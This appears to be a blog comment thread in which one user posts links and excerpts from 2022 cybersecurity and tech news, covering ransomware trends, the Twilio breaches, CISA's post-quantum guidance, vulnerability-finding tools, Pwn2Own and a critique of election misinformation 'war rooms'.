As fears over recession loom in many places globally, both cybercrime and job insecurity are on the rise. Meanwhile, some layoffs have occurred and the conversations at work around working-from-anywhere or back to the office continue. And if history tells us anything, it’s that this type of environment is ripe for the increased use of “cyber mules” – aka the cybercrime world’s money mules. In fact, FortiGuard Labs researchers have seen almost 100% growth in new ransomware variants in 2022 so far compared to the prior six months.
Tomi Engdahl says:
US consumers expect cyberattacks on uncrewed military vehicles
https://www.c4isrnet.com/home/2022/08/23/us-consumers-expect-cyberattacks-on-uncrewed-military-vehicles/
Tomi Engdahl says:
Ransomware Attacks are on the Rise
https://threatpost.com/ransomware-attacks-are-on-the-rise/180481/
Lockbit is by far this summer’s most prolific ransomware group, trailed by two offshoots of the Conti group. With data gathered by “actively monitoring the leak sites used by each ransomware group and scraping victim details as they are released, ” researchers have determined that Lockbit was by far the most prolific ransomware gang in July, behind 62 attacks. That’s ten more than the month prior, and more than twice as many as the second and third most prolific groups combined. “Lockbit 3.0 maintain their foothold as the most threatening ransomware group, ” the authors wrote, “and one with which all organizations should aim to be aware of.”. Those second and third most prolific groups are Hiveleaks 27 attacks and BlackBasta 24 attacks.
These figures represent rapid rises for each group since June, a 440 percent rise for Hiveleaks, and a 50 percent rise for BlackBasta. It may well be that the resurgence in ransomware attacks, and the rise of these two particular groups, are intimately connected.
Tomi Engdahl says:
Preparing Critical Infrastructure for Post-Quantum Cryptography https://www.cisa.gov/uscert/ncas/current-activity/2022/08/24/preparing-critical-infrastructure-post-quantum-cryptography
CISA has released CISA Insights: Preparing Critical Infrastructure for Post-Quantum Cryptography, which outlines the actions that critical infrastructure stakeholders should take now to prepare for their future migration to the post-quantum cryptographic standard that the National Institute of Standards and Technology (NIST) will publish in 2024. = CISA strongly urges critical infrastructure stakeholders follow the recommendations in the Insights now to ensure a smooth migration to the post-quantum cryptography standard. . = File: . = https://www.cisa.gov/sites/default/files/publications/cisa_insight_post_quantum_cryptography_508.pdf
Tomi Engdahl says:
FCC launches investigation into mobile carriers’ geolocation data practices https://therecord.media/fcc-launches-investigation-into-mobile-carriers-geolocation-data-practices/
The Federal Communication Commission on Thursday shared responses from mobile carriers to a probe of how they handle geolocation data and announced a new investigation into carrier compliance with agency rules about disclosing how such data is stored and shared.
Tomi Engdahl says:
The number of companies caught up in in recent hacks keeps growing https://arstechnica.com/information-technology/2022/08/the-number-of-companies-caught-up-in-the-twilio-hack-keeps-growing/
In recent weeks, security provider Twilio revealed it was breached by well resourced phishers, who used their access to steal data from 163 of its customers. Security firm Group-IB, meanwhile said that the same phishers who hit Twilio breached at least 136 companies in similar advanced attacks. Three companies — Twilio-owned Authy, password manager LastPass, and food delivery network DoorDash in recent days have all disclosed data breaches that appear to be related to the same activity. Authentication service Okta and secure messenger provider Signal, both recently said their data was accessed as a result of the Twilio breach.
Tomi Engdahl says:
Exposing a Compilation of Known Ransomware Group’s Dark Web Onion Web Sites – An OSINT Analysis https://ddanchev.blogspot.com/2022/08/exposing-compilation-of-known.html
I’ve decided to share with everyone some of the findings from some of my latest Dark Web research with the idea to improve your situational awareness in the world of growing and emerging cyber threats including ransomware releases on the infamous Dark Web. In this post I’ll provide a currently active list of Dark Web Onion web sites that exclusively belong to various ransomware groups with the idea to assist everyone on their way to improve their situational awareness in the world of fighting and responding including to monitor and track down various ransomware campaigns globally.
Tomi Engdahl says:
Eight-Year Study Shows the Dark Side of WordPress Plugins https://www.cc.gatech.edu/news/eight-year-study-shows-dark-side-wordpress-plugins
Since 2012 researchers in the Georgia Tech Cyber Forensics Innovation Laboratory (CyFI Lab) have uncovered 47, 337 malicious plugins across 24, 931 unique WordPress websites through a web development tool they named YODA. According to a newly released paper about the eight-year study, the researchers found that every compromised website in their dataset had two or more infected plugins. The findings also indicated that 94% of those plugins are still actively infected.
Tomi Engdahl says:
Virve harppaa radiopuhelimesta älypuhelimeen tällainen on elintärkeä viranomaisverkko, jonka kautta kulkee 74 miljoonaa viestiä viikoittain https://yle.fi/uutiset/3-12593038?origin=rss
Parikymmentä vuotiaalla Virve-verkolla on edessään huimat näköalat, kun perinteinen kapeakaistainen radiopuhelinliikenne muuttuu 4G- ja
5G- mobiiliverkkoa hyödyntäväksi laajakaistaverkoksi. Uudessa viranomaisverkossa voidaan puheen lisäksi välittää kuvia ja videota.
Virveä käyttävät pelastustoimi, sosiaali- ja terveystoimi, poliisi, Puolustusvoimat, rautatiet, hätäkeskus ja lukuisat muut turvallisuustoimijat, kuten Yleisradio. Virve-verkossa puhelut ja ryhmäpuhelut kulkevat samanaikaisesti isollekin ryhmälle turvatusti.
Vanha järjestelmä toimii uuden rinnalla vähintään vuoden 2025 loppuun.
Tomi Engdahl says:
Facebook Parent Settles Suit in Cambridge Analytica Scandal
https://www.securityweek.com/facebook-parent-settles-suit-cambridge-analytica-scandal
Facebook’s corporate parent has reached a tentative settlement in a lawsuit alleging the world’s largest social network service allowed millions of its users’ personal information to be fed to Cambridge Analytica, a firm that supported Donald Trump’s victorious presidential campaign in 2016.
Terms of the settlement reached by Meta Platforms, the holding company for Facebook and Instagram, weren’t disclosed in court documents filed late Friday. The filing in San Francisco federal court requested a 60-day stay of the action while lawyers finalize the settlement. That timeline suggested further details could be disclosed by late October.
The accord was reached just a few weeks before a Sept. 20 deadline for Meta CEO Mark Zuckerberg and his long-time chief operating officer, Sheryl Sandberg, to submit to depositions during the final phases of pre-trial evidence gathering, according to court documents.
Zuckerberg, who founded Facebook in 2004 as a Harvard University student, could have been deposed for up to six hours. Sandberg, who is stepping down as chief operating officer after a 14-year stint, could have been questioned for up to five hours.
Tomi Engdahl says:
CISA Urges Critical Infrastructure to Prepare for Post-Quantum Cryptography
https://www.securityweek.com/cisa-urges-critical-infrastructure-prepare-post-quantum-cryptography
The US Cybersecurity and Infrastructure Security Agency (CISA) has outlined the steps that critical infrastructure organizations should take to prepare for the migration to the new post-quantum cryptographic standard.
The National Institute of Standards and Technology (NIST) is expected to publish the standard in 2024, but CISA urges stakeholders to prepare in advance, citing potential risks from quantum computing to the entire critical infrastructure.
Quantum computers use qubits, or ‘quantum bits’, to deliver higher computing power and speed in certain scenarios, including solving mathematical problems that the current encryption standards rely on.
As such, quantum computing is expected to become a threat to current cryptographic standards, which support network security and also ensure data confidentiality and integrity.
“In the hands of adversaries, sophisticated quantum computers could threaten U.S. national security if we do not begin to prepare now for the new post-quantum cryptographic standard,” CISA says.
Tomi Engdahl says:
Crypto Firms Say US Sanctions Limit Use of Privacy Software
https://www.securityweek.com/crypto-firms-say-us-sanctions-limit-use-privacy-software
The Treasury Department is facing pushback from the cryptocurrency industry over sanctions imposed on a firm accused of helping to launder billions of dollars — with some funds going to North Korean hackers.
Earlier this month, the Treasury Department imposed sanctions on the virtual currency mixing firm, Tornado Cash, which allegedly helped to launder more than $7 billion worth of virtual currency since its creation in 2019.
Mixing services combine various digital assets, including potentially illegally and legitimately obtained funds, to keep the origins of the funds secret, including money that has been stolen.
In the weeks after the sanctions were announced, crypto firms, lobbyists and at least one lawmaker have come to the firm’s defense, saying the sanctions open the door to limiting Americans’ usage of privacy software.
Coin Center, a nonprofit crypto advocacy firm, says Treasury’s financial crimes enforcement arm “overstepped its legal authority” through its sanctions, which “potentially violates constitutional rights to due process and free speech.”
Tomi Engdahl says:
https://www.securityweek.com/facebook-parent-settles-suit-cambridge-analytica-scandal
Tomi Engdahl says:
Uh, so Samsung asked customer to DRILL through SSD before returning it
Samsung Germany asked a customer to physically destroy his Samsung 980 PRO SSD by smashing it with a hammer, or drilling it, before returning it for RMA.
Read more: https://www.tweaktown.com/news/88140/uh-so-samsung-asked-customer-to-drill-through-ssd-before-returning-it/index.html
Tomi Engdahl says:
Tor 101: How Tor Works and its Risks to the Enterprise https://unit42.paloaltonetworks.com/tor-traffic-enterprise-networks/
The Tor project provides one of the most well-known tools that users can leverage to stay anonymous on the internet. People use Tor for many different reasons, both benign and malicious.
Tomi Engdahl says:
CISA: Prepare now for quantum computers, not when hackers use them https://www.bleepingcomputer.com/news/security/cisa-prepare-now-for-quantum-computers-not-when-hackers-use-them/
Although quantum computing is not commercially available, CISA (Cybersecurity and Infrastructure Security Agency) urges organizations to prepare for the dawn of this new age, which is expected to bring groundbreaking changes in cryptography, and how we protect our secrets.
Tomi Engdahl says:
Galois Open Sources Tools for Finding Vulnerabilities in C, C++ Code
https://www.securityweek.com/galois-open-sources-tools-finding-vulnerabilities-c-c-code
Galois, a firm specialized in the research and development of new technologies, has open sourced a suite of tools for identifying vulnerabilities in C and C++ code.
Dubbed MATE, the tools are the result of a collaborative effort supported by the United States Air Force and Defense Advanced Research Project Agency (DARPA).
Now available under the BSD 3-clause license, MATE relies on code property graphs (CPGs) for static program analysis, and can identify application-specific bugs that depend on implementation details and high-level semantics.
The CPG includes a target’s abstract syntax tree (AST), call graph (CG), control-flow graph (CFG), inter-procedural control-flow graph (ICFG), inter-procedural dataflow-graph (DFG), control-dependence graph (CDG), memory layout and DWARF type graph, points-to graph (PTG), and source-code to machine-code mapping.
The suite includes several applications built on top of the foundation of the CPG, including Flowfinder, MATE Notebooks, MATE POIs, and Mantiserve.
Flowfinder provides a browser-based user interface that helps in exploring a program’s code property graph, for interprocedural analysis of dataflows. It supports expanding and contracting semantic representations of code and data, as well as creating and manipulating visualizations of flows between components.
Tomi Engdahl says:
MATE: Merged Analysis To prevent Exploits
https://galoisinc.github.io/MATE/
MATE is a suite of tools for interactive program analysis with a focus on hunting for bugs in C and C++ code. MATE unifies application-specific and low-level vulnerability analysis using code property graphs (CPGs), enabling the discovery of highly application-specific vulnerabilities that depend on both implementation details and the high-level semantics of target C/C++ programs.
Tomi Engdahl says:
Ryan Broderick / Garbage Day:
Social media “war rooms” that are set up to fight misinformation and reported on by the media ahead of the US midterms are nothing more than theater
The Election War Room Scam
https://www.garbageday.email/p/bracing-for-impact?triedSigningIn=true
We’re less than three months away from the US midterms, which means we are officially in the “Here’s what this tech company is doing to battle misinformation” news cycle. So, let’s see how it’s going, shall we? Twitter says it’s focusing on “elevating reliable resources”. Facebook is going to be using “false content” warning labels and restricting political ad purchases in the week before the election. And TikTok is really pulling out all the stops.
TikTok published a blog post laughably titled, “Our commitment to election integrity,” earlier this month. What’s the commitment? A register to vote widget! An “Elections Center” hub inside the app! Revolutionary stuff. Partnerships with fact-checking organizations! You love to see it. TikTok also says it will block paid political content, which, you know, ignoring the existence of dark money, is a good step, I suppose.
I want to ask something of an uncomfortable question. Why does misinformation and disinformation suddenly matter during an election? It’s a question that’s been on my mind for years.
And, while I think what we do online impacts how we see the world and, thus, affects how our democracies function, it feels as if both the media and the companies that run these platforms have turned misinformation and disinformation into a weird live event focused on the idea that if voters see too many bad posts in the week leading up to a big vote, democracy is doomed. Never mind all the bad posts they see every other day of the year.
I remember the hilariously dumb “war room” that Facebook setup for Brazil’s 2018 election, complete with little Brazilian flags on computers. I imagine it was similar to what I saw in Italy, which was a bunch of screens with live CrowdTangle dashboards, basically. Only, in 2018, Facebook’s “war room” did not to stop misinformation about Brazil’s election from spreading via the platform’s very own ad library. Also, the biggest source of election misinformation in Brazil was WhatsApp
When platforms set up these “war rooms” and get news organizations to report on these stunts as if they matter, they’re able to create this mental picture of a company proactively safeguarding their platform to uphold democracy. They want you to imagine Mark Zuckerberg standing in a command center bracing for impact as a Macedonian high school computer lab deploys a wave of Pepe the Frog memes in the replies to an unsuspecting CNN anchor’s tweet.
It’s all theater and it’s meant to obscure the fact that misinformation and disinformation are integral parts of using a user-generated content platform with a sharing functionality. I mean, really seriously, just stop for a second and think about how you would even solve this problem. There are obviously notable differences between how Twitter and 4chan are moderated, but misinformation and disinformation are inseparable parts of both.
Mark Scott, the chief technology correspondent for Politico, had a great series of tweets about this earlier this month. “If your strategy is to rely on fact-checkers for content moderation and/or election integrity on social media, you might as well just give up and go home,” he wrote. “This is not to knock the work of all of fact-checking groups out there. It is a noble aim: to debunk falsehoods. But they are understaffed, under-resourced and, increasingly, faced financial pressures to pump out as many fact-checks as possible vs making a notable difference.”
Alright, so, you’re probably saying, “ok, tough guy, well, what do we do if we can’t rely on fact-checkers?” Well, honestly, media blackouts are a possible model. America obviously doesn’t have them, but many countries have specific rules about how mass media can report on an election in the pivotal hours leading up to it. I think it’s interesting that these platforms spend a huge amount of resources on their little widgets and hubs and tabs and labels, but none of them are “committed to democracy” enough to just pull the plug on themselves for two days. We had elections before social media. It, arguably, went a lot better tbh.
Tomi Engdahl says:
77% Of Security Leaders Fear We’re In Perpetual Cyberwar From Now On
https://blog.deurainfosec.com/77-of-security-leaders-fear-were-in-perpetual-cyberwar-from-now-on/
A survey of cybersecurity decision makers found 77 percent think the world is now in a perpetual state of cyberwarfare.
In addition, 82 percent believe geopolitics and cybersecurity are “intrinsically linked,” and two-thirds of polled organizations reported changing their security posture in response to the Russian invasion of Ukraine.
Of those asked, 64 percent believe they may have already been the target of a nation-state-directed cyberattack.
Tomi Engdahl says:
I Tried the Privacy Phone Network Intended to Mask Your Identity
Pretty Good Phone Privacy, or PGPP, is a novel new system that attempts to separate your phone usage from your identity.
https://www.vice.com/en/article/n7z7wb/how-to-change-my-imsi-privacy-phone-pgpp-invisv
Tomi Engdahl says:
Pentest Interview Questions
https://cisotimes.com/pentest-interview-questions/
Tomi Engdahl says:
https://pentestmag.com/cybersecurity-risks-and-how-to-prevent-them-effectively/
Tomi Engdahl says:
Announcing Google’s Open Source Software Vulnerability Rewards Program https://security.googleblog.com/2023/08/Announcing-Googles-Open-Source-Software-Vulnerability-Rewards-Program%20.html
Today, we are launching Google’s Open Source Software Vulnerability Rewards Program (OSS VRP) to reward discoveries of vulnerabilities in Google’s open source projects. As the maintainer of major projects such as Golang, Angular, and Fuchsia, Google is among the largest contributors and users of open source in the world.
Tomi Engdahl says:
Cyber Signals: 3 strategies for protection against ransomware https://www.microsoft.com/security/blog/2022/08/30/cyber-signals-3-strategies-for-protection-against-ransomware/
The “as a service” business model has gained widespread popularity as growing cloud adoption has made it possible for people to access important services through third-party providers. Given the convenience and agility of service offerings, perhaps it shouldn’t be surprising that the “as a service” model is being used by cybercriminals for nefarious purposes.
Tomi Engdahl says:
The security benefits of modern collaboration in the cloud https://www.ncsc.gov.uk/blog-post/the-security-benefits-of-modern-collaboration-in-the-cloud
When using cloud services, it is important to balance the need to open up’ access to information (to allow collaboration) with the need to lock down’ to protect sensitive information.
Tomi Engdahl says:
How and Why Do Teens Become Cyber Criminals?
https://securityintelligence.com/articles/why-teens-become-cyber-criminals/
The search to find the mastermind of the attacker group Lapsus$ led to a home outside Oxford, England. The suspected leader was a 16-year-old. He helped take down some of the world’s biggest companies, including Microsoft, from his mother’s house.
Tomi Engdahl says:
FBI Warns Investors to Take Precautions with Decentralized Financial Platforms https://thehackernews.com/2022/08/fbi-warns-investors-to-take-precautions.html
The U.S. Federal Bureau of Investigation (FBI) on Monday warned of cyber criminals increasingly exploiting flaws in decentralized finance
(DeFi) platforms to plunder cryptocurrency.
Tomi Engdahl says:
https://www.securityweek.com/fbi-warns-surge-attacks-targeting-defi-platforms
Tomi Engdahl says:
Academics Devise Open Source Tool For Hunting Node.js Security Flaws
https://www.securityweek.com/academics-devise-open-source-tool-hunting-nodejs-security-flaws
A group of academic researchers have designed an open source Node.js bug hunting tool that has already identified 180 security vulnerabilities.
Node.js is an open-source, cross-platform, environment for running JavaScript code outside the browser. It was designed for the development of network applications. While useful, many of the available Node.js packages contain unknown flaws leading to application compromise.
Now, academics from the Johns Hopkins University and Renmin University of China propose a new approach to finding security vulnerabilities in Node.js packages.
Inspired by the graph query-based approaches such as Code Property Graph (CPG), the researchers devised a novel graph structure called Object Dependence Graph (ODG), and also built an open-source prototype system called ‘ODGEN’, to use ODG for bug hunting.
ODG models JavaScript objects as nodes and represents their relations with Abstract Syntax Tree (AST) as edges.
“Specifically, ODG includes fine-grained data dependencies between objects, thus helping taint-style vulnerability detection such as command injection,” according to a research paper (.pdf) documenting the work.
The new approach generates ODG using “flow- and context-sensitive static analysis with hybrid branch-sensitivity and points-to information”, the group said, noting that ODG can be used for the offline detection of various types of Node.js vulnerabilities.
Mining Node.js Vulnerabilities via Object Dependence Graph and Query
https://www.usenix.org/system/files/sec22summer_li-song.pdf
Tomi Engdahl says:
Pwn2Own Offers $100,000 for Home Office Hacking Scenario
https://www.securityweek.com/pwn2own-offers-100000-home-office-hacking-scenario
Trend Micro’s Zero Day Initiative (ZDI) has announced the targets and prizes for its next Pwn2Own hacking competition, as well as the introduction of a new category that aims to simulate a real world home office environment.
The next Pwn2Own will take place December 6-8, 2022, at ZDI’s office in Toronto, Canada. The registration deadline is December 2. The event will not take place alongside a conference so ZDI has decided to reimburse $3,000 for travel expenses to encourage hackers to participate in person. Bug bounty hunters can also compete remotely, with a ZDI employee in Toronto running the exploit for them.
The organizer is offering a total of more than $1 million in cash and prizes for exploits targeting mobile phones, wireless routers, home automation hubs, smart speakers, printers and NAS devices.
https://www.zerodayinitiative.com/blog/2022/8/29/announcing-pwn2own-toronto-2022-and-introducing-the-soho-smashup#soho